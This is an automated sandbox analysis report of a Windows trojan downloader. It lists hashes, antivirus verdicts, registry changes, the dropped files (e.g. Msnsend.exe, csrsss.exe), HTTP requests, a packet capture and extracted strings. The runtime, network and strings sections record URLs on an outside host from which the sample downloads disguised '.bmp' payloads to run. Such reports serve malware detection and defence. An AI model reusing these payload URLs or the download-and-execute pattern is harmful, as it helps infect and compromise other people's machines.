Analysis Date2014-06-30 02:26:34
MD5b1f51ca13ed8f815d4b36488b506b095
SHA1007af757a4065d37f9dde5553e13a14d09e211c8

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d20910422daa3514b4ba18e0be5eea46 sha1: 837b5e4deb3fd29758345cf0a69e177fcf140b04 size: 491520
Section.rsrc md5: f811a0e1c705cb46016a7c861c71e0a1 sha1: 885003287b155ba52d4858420e1f81fc7fe65f32 size: 4096
Section.edata md5: 12ed0d6febc1883f62d021b143fa1cda sha1: e25acbaa5ce7ca4bf618ec465ae195d4b900fa70 size: 8192
Timestamp2001-08-17 20:52:32
PackerBorland C++ DLL
PEhashc1e8431d9d6b4d779fb2c4aad05a2811ef97d8f8
IMPhash0408aa1e9015fe551f89b7718eb347e6
AV360 SafeTrojan.Generic.5138689
AVAd-AwareTrojan.Generic.5138689
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)Downloader.Agent.Cumu
AVAuthentiumno_virus
AVAvira (antivir)TR/Dropper.Gen
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)TrojanDownloader.Agent.cumu
AVClamAVno_virus
AVDr. WebTrojan.DownLoad1.51928
AVEmsisoftTrojan.Generic.5138689
AVEset (nod32)Win32/TrojanDownloader.Banload.OGN
AVFortinetW32/Agent.ARNB!tr.dldr
AVFrisk (f-prot)no_virus
AVF-SecureTrojan.Generic.5138689
AVGrisoft (avg)Downloader.Agent2.UYG
AVIkarusTrojan-Dropper.Agent
AVK7Riskware ( 0040eff71 )
AVKasperskyTrojan-Downloader.Win32.Agent.cumu
AVMalwareBytesno_virus
AVMcafeeno_virus
AVMicrosoft Security EssentialsTrojan:Win32/Dynamer!dtc
AVMicroWorld (escan)Trojan.Generic.5138689
AVNormanwinpe/Suspicious_Gen2.EWDCZ
AVRisingno_virus
AVSophosno_virus
AVSymantecTrojan.Gen
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates ProcessC:\Documents and Settings\All Users\Dados de aplicativos\Msnsend.exe
Winsock DNSmodulosgrande.hpg.com.br
Winsock URLhttp://modulosgrande.hpg.com.br/drgrandao.bmp
Winsock URLhttp://modulosgrande.hpg.com.br/logegrandao.bmp
Winsock URLhttp://modulosgrande.hpg.com.br/hugrandao.bmp
Winsock URLhttp://modulosgrande.hpg.com.br/sendgrandao.bmp

Process
↳ C:\Documents and Settings\All Users\Dados de aplicativos\Msnsend.exe

Network Details:

DNSmodulosgrande.hpg.com.br
Type: A
187.31.64.20
HTTP GEThttp://modulosgrande.hpg.com.br/hugrandao.bmp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://modulosgrande.hpg.com.br/drgrandao.bmp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://modulosgrande.hpg.com.br/logegrandao.bmp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://modulosgrande.hpg.com.br/sendgrandao.bmp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 187.31.64.20:80
Flows TCP192.168.1.1:1033 ➝ 187.31.64.20:80
Flows TCP192.168.1.1:1034 ➝ 187.31.64.20:80
Flows TCP192.168.1.1:1035 ➝ 187.31.64.20:80

Raw Pcap
0x00000000 (00000)   47455420 2f687567 72616e64 616f2e62   GET /hugrandao.b
0x00000010 (00016)   6d702048 5454502f 312e310d 0a416363   mp HTTP/1.1..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000030 (00048)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000040 (00064)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000050 (00080)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000060 (00096)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000070 (00112)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000080 (00128)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000090 (00144)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000a0 (00160)   290d0a48 6f73743a 206d6f64 756c6f73   )..Host: modulos
0x000000b0 (00176)   6772616e 64652e68 70672e63 6f6d2e62   grande.hpg.com.b
0x000000c0 (00192)   720d0a43 6f6e6e65 6374696f 6e3a204b   r..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f647267 72616e64 616f2e62   GET /drgrandao.b
0x00000010 (00016)   6d702048 5454502f 312e310d 0a416363   mp HTTP/1.1..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000030 (00048)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000040 (00064)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000050 (00080)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000060 (00096)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000070 (00112)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000080 (00128)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000090 (00144)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000a0 (00160)   290d0a48 6f73743a 206d6f64 756c6f73   )..Host: modulos
0x000000b0 (00176)   6772616e 64652e68 70672e63 6f6d2e62   grande.hpg.com.b
0x000000c0 (00192)   720d0a43 6f6e6e65 6374696f 6e3a204b   r..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6c6f67 65677261 6e64616f   GET /logegrandao
0x00000010 (00016)   2e626d70 20485454 502f312e 310d0a41   .bmp HTTP/1.1..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000030 (00048)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000040 (00064)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a206d 6f64756c   27)..Host: modul
0x000000b0 (00176)   6f736772 616e6465 2e687067 2e636f6d   osgrande.hpg.com
0x000000c0 (00192)   2e62720d 0a436f6e 6e656374 696f6e3a   .br..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f73656e 64677261 6e64616f   GET /sendgrandao
0x00000010 (00016)   2e626d70 20485454 502f312e 310d0a41   .bmp HTTP/1.1..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000030 (00048)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000040 (00064)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a206d 6f64756c   27)..Host: modul
0x000000b0 (00176)   6f736772 616e6465 2e687067 2e636f6d   osgrande.hpg.com
0x000000c0 (00192)   2e62720d 0a436f6e 6e656374 696f6e3a   .br..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....


Strings
.
\
.-
-000
-+
01
"\
EE

Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Application Error1Format '%s' invalid or incompatible with argument
April
Assertion failed
August	September
(B\B
Control-C hit
December
Division by zero
DVCLAL
Error creating variant array!Variant array index out of bounds
Exception in safecall method
External exception %x
February
File access denied
File not found
Floating point division by zero
Floating point overflow
Floating point underflow
Friday
         (((((                  H
+INF
Integer overflow Invalid floating point operation
Interface not supported
Invalid argument
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid filename
Invalid numeric input
Invalid pointer operation
Invalid variant operation!Invalid variant operation ($%.8x)
Invalid variant type
Invalid variant type conversion
I/O error %d
January
jjjj
July
June
MAINICON
MAINICON(
March
Monday
-NAN
+NAN
N-INF
No argument for format '%s'"Variant method calls not supported
November
October
Operation not supported
Out of memory
Privileged instruction(Exception %s in module %s at %p.
Range check error
Read
Read beyond end of file	Disk full
Saturday
!'%s' is not a valid integer value"'%s' is not a valid currency value!'%g' is not a valid date and time
%s%s
%s (%s, line %d)
Stack overflow
Sunday
Thursday
Too many open files
Tuesday	Wednesday
Unexpected variant error
Variant array is locked
Variant is not an array5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Variant overflow
Write
                                                                
),(((((),(((
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
0$0*00060<0B0H0N0T0Z0`0f0l0r0x0~0
0 0&0,02080>0D0J0P0V0\0b0h0n0t0z0
0(0$0D0L0P0T0X0\0`0d0h0l0
: ;<0@0D0H0L0P0T0X0\0`0d0h0l0t0x0|0
0(0H0d0|0
?(0-0H0M0h0m0p1
0123456789ABCDEF02A
0&1O1v1
%02d/%02d/%04d %02d:%02d:%02d.%03d 
0,2P200<0H0x0
> >$>(>,>0>4>8><>@>D>
; ;(;,;0;4;8;<;@;D;H;\;|;
= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
: :$:(:,:0:4:8:<:@:P:p:x:|:
? ?$?(?,?0?4?8?<?T?a?i?x?
:0:4:@:D:H:T:X:
0686@6H6P6X6`6h6p6x6
= =(=0=8=@=H=P=X=`=h=p=x=
> >(>0>8>@>H>P>X>`>h>p>x>
? ?(?0?8?@?H?P?X?s?g?
090[0j0z0
0G0;0T0f0
0L1k1o1s1w1{1
0X1\1`1d1h1l1p1t1x1|1
0_^[Y]
101T1x1
1&101:1
1 1$1(1,1014181<1@1X1p1t1
1 1$1(1,10141L1P1X1\1`1d1
1!1%1)1-1$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3L5
1 1&1,12181>1D1J1P1V1\1b1h1n1t1z1
1"1(1.141:1@1F1L1R1X1r1w1
1"1*121:1B1J1R1Z1b1s1~1
1 151|1\1
1,1P1t1
"1+1y1
1,212e3j3
1,2L2T2X2\2`2d2h2l2p2t2
142o3s3w3{3
<!<%<)<-<1<5<9<=<A<E<I<M<Q<U<Y<]<a<e<
 2006-2007 Ashkbiz Danehkar 
202:2@2T2\2n2
2$2*222
2 2$2(2,20242P2p2x2
2 2<2X2t2
2)2C2Y2b2
2(2L2p2
23282b2g2
2,3_3m3r3
2-3@3R3>4q4
2)3h3y3
=2>D>I>
>-?2?Q?V?
2S3^3i3
303<3v3
323>3F3U3
3 313I3^3v3
3"3&3*3.32363:3>3B3F3J3N3R3V3Z3^3
3%3,3P3_3j3w3
3.363@3W3b3
3%383P3o3w3
3"5f5k5
>#>'>+>/>3>7>;>
383@3D3H3L3P3T3X3\3`3|3
< <)<3<9<C<
3d3m3}3
3T4m4p5 :
=(>4>@>
:@<4080<0@0L0P0T0\0`0d0h0l0p0t0x0~0
4-424B4G4U4a4m4y4
4 4$4(4H4h4p4t4x4|4
4&4a4W5
4?4I4S4[4a4
4-5>5W5
485<5@5D5H5`5d5h5l5p5t5x5|5
?49@9L9X9d9p9|9
4C5J5Q5X5)4;4g4{4
<4<<<@<D<H<L<P<T<X<\<t<
=4=I=^=A>E>I>M>Q>U>Y>]>a>e>i>m>q>u>y>}>
:(:4:@:L:X:d:h:t:p:|:
505R5a5<7
545<5@5D5H5L5P5T5X5\5|5
5*50595m5v5
5-525^5c5y5~5
556O6S6W6[6_6c6g6k6o6s6w6{6
5/5F5]5t5
5'6-6F6O6X6c6l6s6
5`6d6h6l6p6t6x6|6
5b6I6y6
?5?b?z?
5g334;4y4
5K5U5_5o5v5~5
6"4L4m4
6!555A5P5Z5e5j5
6&6.666
6 6$6(6[6j6M6
6<6D6H6L6P6T6X6\6`6d6x6
6E6S6b6q6
:6:%;_;i;
<6=j=t=
6W6e6j6
728@8E8
72969:9>9B9F9J9N9R9V9Z9^9b9f9j9n9r9v9z9~9
7&6*6.62666:6>6
7!7%7)7-7175797=7
777;7?7C7G7K7
7-7>7J7S7
7,7L7T7X7\7`7d7h7l7p7t7
7"8&8*8.82868:8>8B8F8J8N8R8V8Z8^8b8f8j8n8r8v8
7&8,8<8E8
7@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
7A9E9I9M9Q9U9Y9]9a9e9i9m9
7K7Z7=7q7
7k8W9m9
: :7:;:p:t:x:
7v5T7q7
<#<-<8<@<
; <,<8<
808@8h8x8
8'848K8
8]8 707H7X7l7x7
8 8(80888@8H8P8X8`8
8$8,848<8D8L8T8\8d8h8p8x8
8!8'8.84898?8D8J8Q8W8a8
8 8$8(8,8<8\8d8h8l8p8t8x8|8
8%8i8{8
8;8J8-8a8*9|2
8%9:9K9U9[9
<"<(<8<A<
: :,:8:D:P:\:
:$:8:G:h:w:
<$<8<H<X<x<
8l8t8|8
;#;8;M;b;w;
;8:>:P:t:|:
94989<9
9$909<9
9&949Z9m9
9 9,989D9H9T9`9l9x9
9 9$9(9,9094989<9@9D9H9L9
9 9$9(9,90949H9h9p9t9x9|9
99Z9i9
9A:F:^:c:
9K5d5v5
9P9\9h9t9
9P:p:t8
A7E7I7M7Q7U7Y7]7a7e7i7m7q7h9l9p9t9x9|9
%A, %B %d, %Y
Abnormal program termination
ADVAPI32.DLL
>a>e>i>m>q>u>y>}>
Alle Rechten reservierten
allocating handle lock table
allocating stream lock table
All Rights Reserved
AnsiString *
Arg list too big
argType
Array 
Assertion failed: 
Attempted to remove current directory
August
Bad address
bad_alloc *
bad alloc exception thrown
!"Bad exception number"
Bad exception number
bad exception thrown
Bad file number
**BCCxh1
bl->blOffs == 0
Block device required
!"bogus context in _ExceptionHandler()"
bogus context in _ExceptionHandler()
!"bogus context in Local_unwind()"
bogus context in Local_unwind()
Boolean
Borland C++ - Copyright 2002 Borland Corporation
borlndmm
@Borlndmm@HeapAddRef$qqrv
@Borlndmm@HeapRelease$qqrv
@Borlndmm@SysFreeMem$qqrpv
@Borlndmm@SysGetMem$qqri
@Borlndmm@SysReallocMem$qqrpvi
Broken pipe
</<B<V<Z<^<b<f<
ByRef 
:';c;7;B;q;{;
!"Can't adjust class address (no base class entry found)"
Can't adjust class address (no base class entry found)
Cardinal
Casa pagina: http://www.ntkrnl.com  
cctrAddr
C:\Documents and Settings\All Users\Dados de aplicativos\csrsss.exe
C:\Documents and Settings\All Users\Dados de aplicativos\Msnloge.exe
C:\Documents and Settings\All Users\Dados de aplicativos\Msnsend.exe
C:\Documents and Settings\All Users\Dados de aplicativos\winlomm.exe
CharNextA
CloseHandle
CompareStringA
const 
Copyright 
Could not allocate memory for environment block
___CPPdebugHook
__CPPexceptionList
CreateEventA
CreateFileA
creating atexit lock
creating environment lock
creating global handle lock
creating global stream lock
creating handle lock
creating stream lock
creating thread data lock
Cross-device link
(ctorMask & 0x0080) == 0
(ctorMask & 0x0100) != 0 || (ctorMask & 0x0020) == 0
Currency
:.;C;X;m;
DDDDDD
DDDDDDDDDDDDD@
DDDDDDDDDDDDDDp
December
Decimal
DeleteCriticalSection
derv->tpClass.tpcFlags & CF_HAS_BASES
Descri
D<H<L<P<\<h<X<d<p<
> >$><>\>d>h>l>p>t>x>|>
Directory not empty
Dispatch
Double
dscPtr->xdArgCopy == 0
dscPtr->xdERRaddr == errPtr
dscPtr->xdHtabAdr == hdtPtr
dscPtr->xdMask & TM_IS_PTR
(dscPtr->xdMask & TM_IS_PTR) == 0
dscPtr->xdSize == size
dscPtr->xdTypeID == dscPtr->xdBase
dtorAddr
dtorCnt < varCount
(dtorMask & 0x0080) == 0
dtrCount <= vdtCount
dttPtr->dttFlags & (DTCVF_PTRVAL|DTCVF_RETVAL)
dttPtr->dttType->tpMask & TM_IS_PTR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
dtvtPtr->dttType->tpMask & TM_IS_ARRAY
EAbstractError
EAccessViolation
EAccessViolation *
EAccessViolation &
EAssertionFailed
EControlC
	EControlC
EControlC *
EControlC &
EConvertError
.edata
EDivByZero
EDivByZero *
EDivByZero &
	EExternal
EExternal *
EExternalException
EHeapException
EInOutErrorx
	EIntError
EIntError *
EIntfCastError
EIntOverflow
EIntOverflow *
EIntOverflow &
EInvalidCast
EInvalidOp
EInvalidOp *
EInvalidOp &
EInvalidPointer
elemType->tpClass.tpcFlags & CF_HAS_DTOR
E-mail: info@ntkrnl.com 
E-mail: info@ntkrnl.com NTkrnl Geborgene Zeug 
E-Mail: info@ntkrnl.com NTkrnl Sicuro Seguito 
EMathError
EMathError *
EnterCriticalSection
EnumCalendarInfoA
EnumThreadWindows
EOutOfMemory
EOverflow
	EOverflow
EOverflow *
EOverflow &
EPrivilege
EPrivilege *
EPrivilege &
ERangeError
ERangeError *
ERangeError &
ERangeError8
Erro Fatal - Windows Media Player
Error 0
ERROR 10X0203A
ERROR 10X0203D
ERROR 10X0203E
ERROR 10X0203G
Error: system code page access failure; MBCS table not initialized
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
ESafecallException
EStackOverflow
EStackOverflow *
EStackOverflow &
Este programa efetuou uma opera
etdCount <= elemCount || elemCount == 0
EUnderflow
EUnderflow *
EUnderflow &
EVariantArrayCreateError
EVariantArrayLockedError
EVariantBadIndexError
EVariantBadVarTypeError
EVariantDispatchError
EVariantError
EVariantInvalidArgErrordc@
EVariantInvalidOpError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantOverflowError
EVariantTypeCastError
EVariantUnexpectedError,f@
~ExC[)
Exception *
Exception *[2]
	Exceptionh
Exec format error
Executable file in use
ExitProcess
Extended
EZeroDivide
EZeroDivide *
EZeroDivide &
fb:C++HOOK
February
, file 
File already exists
File too large
FindClose
FindFirstFileA
FPUMaskValue
FreeLibrary
Friday
?&?-?:?G?3?@?M?
GetACP
GetCommandLineA
GetCPInfo
GetCurrentThreadId
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetEnvironmentStrings
GetEnvironmentStrings failed
__GetExceptDLLinfo
GetFileSize
GetFileType
GetKeyboardType
GetLastError
GetLocaleInfoA
GetLocalTime
GetLongPathNameA
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetProcessHeap
GetStartupInfoA
GetStdHandle
GetStringTypeExA
GetStringTypeW
GetSystemMetrics
GetThreadLocale
GetVersion
GetVersionExA
=?>G>k>
?H3L3P3T3
handles.c
HauseSeite: http://www.ntkrnl.com   
hdtPtr->HDcctrAddr
HeapAlloc
HeapFree
hlocks
%H:%M:%S
:H:M:Z:!;n;O;a;
Homepage: http://www.ntkrnl.com  
:';H;P;
=(=H=P=T=X=\=`=d=h=l=p=
hrdir_b.c: FATAL!!! memory has been allocated prior to heap redirector hook!
hrdir_b.c: GetMem or FreeMem or ReallocMem from borlndmm failed
hrdir_b.c: LoadLibrary != mmdll borlndmm failed
HRESULT
Ht3Ht[
Ht Ht.
http://modulosgrande.hpg.com.br/drgrandao.bmp
http://modulosgrande.hpg.com.br/hugrandao.bmp
http://modulosgrande.hpg.com.br/logegrandao.bmp
http://modulosgrande.hpg.com.br/sendgrandao.bmp
;><%<i<
id->tpName
IInterface
Illegal seek
;I=M=Q=U=Y=]=a=e=i=m=q=u=y=}=
Inappropriate I/O control operation
INFNAN
InitializeCriticalSection
Input/output error
Integer
InterlockedDecrement
InterlockedIncrement
Interrupted function call
Invalid access code
Invalid argument
Invalid data
Invalid environment
Invalid format
Invalid function number
Invalid memory block address
Is a directory
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
IS_CLASS(varType->tpMask)
__isSameTypeID(srcTypPtr, tgtTypPtr) == 0
IS_STRUC(base->tpMask)
IS_STRUC(blType->tpMask)
IS_STRUC(derv->tpMask)
?j8v8{8
January
=J>^>f>|>
j<n<r<v<z<~<~=
>*>j>q>
kernel32.dll
KERNEL32.DLL
=$=K=U=
;K<Z<t<
LeaveCriticalSection
 letterario riservato 
, line 
LLLLLLLLLN
LoadLibraryA
LoadLibraryExA
LoadStringA
LocalAlloc
LocalFree
LongWord
==<l=q=
lstrcpynA
lstrlenA
?`?l?x?
mask & TM_IS_PTR
mask & TM_IS_REF
Math argument
%m/%d/%y
m/d/yy
Memory arena trashed
memType
memType->tpClass.tpcFlags & CF_HAS_DTOR
MessageBoxA
Metamorphism Portable Eseguibile (PE) Biblioteca del Imballatore e del Protettore 
Metamorphism Portable Executable (PE) Packer and Protector Library 
Metamorphismus Portable Executable (PE) Packer und Besch
(mfnMask & 0x0080) == 0
mmmm d, yyyy
:mm:ss
Monday
;M;S;[;i;{;
MultiByteToWideChar
=-=>=N=
No child processes
No more files
no named exception thrown
No space for command line argument
No space for command line argument vector
No space for copy of command line
No space left on device
No such device
No such device or address
No such file or directory
No such process
Not a directory
Not enough memory
Not same device
<notype>
November
>n?r?v?z?~?
NTkrnl Secure Suite 
>N>Z>b>
?O7S7W7[7_7c7g7k7o7s7w7{7
October
o do problema:
o ilegal e um erro fatal foi gerado,
OLEAUT32.DLL
OleStr
Openstring
Operation not permitted
Out of memory in _setargv0
Path not found
Permission denied
;P;\;h;
Possible deadlock
printf : floating point formats not linked
Propriet
;	<#<q<
Q:a:v:
QQQQQQSVW3
QQQQQSVW
QQQQSV
QUVWRSPT
QVhx-B
<	>?>R0
RaiseException
ReadFile
Read-only file system
RegCloseKey
RegOpenKeyExA
RegQueryValueExA
ResetEvent
Resource busy
Resource temporarily unavailable
Result too large
RtlUnwind
Runtime error     at 00000000
rwstderr
_RWSTDMutex
?s6w6{6
Saturday
scanf : floating point formats not linked
Semaphore error 
se o problema persistir, contacte o desenvolvedor.
September
SetConsoleCtrlHandler
SetEndOfFile
SetEvent
SetFilePointer
SetHandleCount
SetLastError
ShortInt
Single
Smallint
Software\Borland\Delphi\Locales
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
srcmask & TM_IS_REF
srcTypPtr
srcTypPtr == 0 || IS_STRUC(srcTypPtr->tpMask)
Stack Overflow!
std::bad_alloc
std::bad_cast
std::bad_typeid
std::exception
std::type_info
streams.c
String
String|
strm_locks
Sunday
System
System::AnsiString
Systeml
System::TObject
SysUtils
Sysutils::EAccessViolation
Sysutils::EControlC
Sysutils::EDivByZero
Sysutils::EExternal
Sysutils::EIntError
Sysutils::EIntOverflow
Sysutils::EInvalidOp
Sysutils::EMathError
Sysutils::EOverflow
Sysutils::EPrivilege
Sysutils::ERangeError
Sysutils::EStackOverflow
Sysutils::EUnderflow
Sysutils::Exception
Sysutils::EZeroDivide
<*t"<0r=<9w9i
T9d9`9
TAggregatedObject
t?BCIu
TBoundArray
TContainedObject
TCustomVariantType
	TDateTime
	TErrorRec
TExceptRec
tgtTypPtr != 0 && __isSameTypeID(topTypPtr, tgtTypPtr) == 0
tgtTypPtr != 0 && IS_STRUC(tgtTypPtr->tpMask)
!This program cannot be run in DOS mode.
>>>T>h>p>}>
Thursday
TInterfacedObject
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
$TMultiReadExclusiveWriteSynchronizer
TObject
Too many links
Too many open files
topTypPtr != 0 && IS_STRUC(topTypPtr->tpMask)
tp1->tpName
tp2->tpName
!tpid || tpid->tpMask & (TM_IS_PTR | TM_IS_REF)
TThreadLocalCounter2
Tuesday
Turok.exe
>t?x?|?
;";T;x;
typeID || (reThrow && (flags & XDF_ISDELPHIEXCEPTION))
type_info_hash
tzer Bibliothek 
>!?U?a?|?>6F6N6V6^6f6n6y6
UCS4Char
UnhandledExceptionFilter
Unknown
Unknown error
((unsigned __far *)vftAddr)[-1] == 0
((unsigned __far *)vtablePtr)[-1] == 0
Urheberrechtlicher 
URLDownloadToFileA
URLMON.DLL
USER32.DLL
UTF8StringD
Variant
Variants
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpMask & TM_IS_ARRAY
varType->tpMask & TM_IS_PTR
vdtCount
Version 0.1 
>*>@>V>$=G=n>
VirtualAlloc
VirtualFree
VirtualQuery
volatile 
WaitForSingleObject
:W:[:_:c:g:k:o:s:w:{:
Wednesday
!"what?"
WideCharToMultiByte
WinExec
WriteFile
wsprintfA
wwwwwwwDDDDDDDGO
wwwwwwwwwwwwwwp
:w;x<|<
$x7Rich
=-=X=\=`=d=h=l=p=t=x=|=
=X=d=p=
xdp->xdArgBuff
xdrPtr->xdERRaddr == xl
xdrPtr && xdrPtr == *xdrLPP
xx.cpp
xxtype.cpp
$y7D$x79
_^[YY]
$YZ]_^[
YZ]_^[
YZXtm1
(Z]_^[
$Z]_^[
ZTUWVSPRTj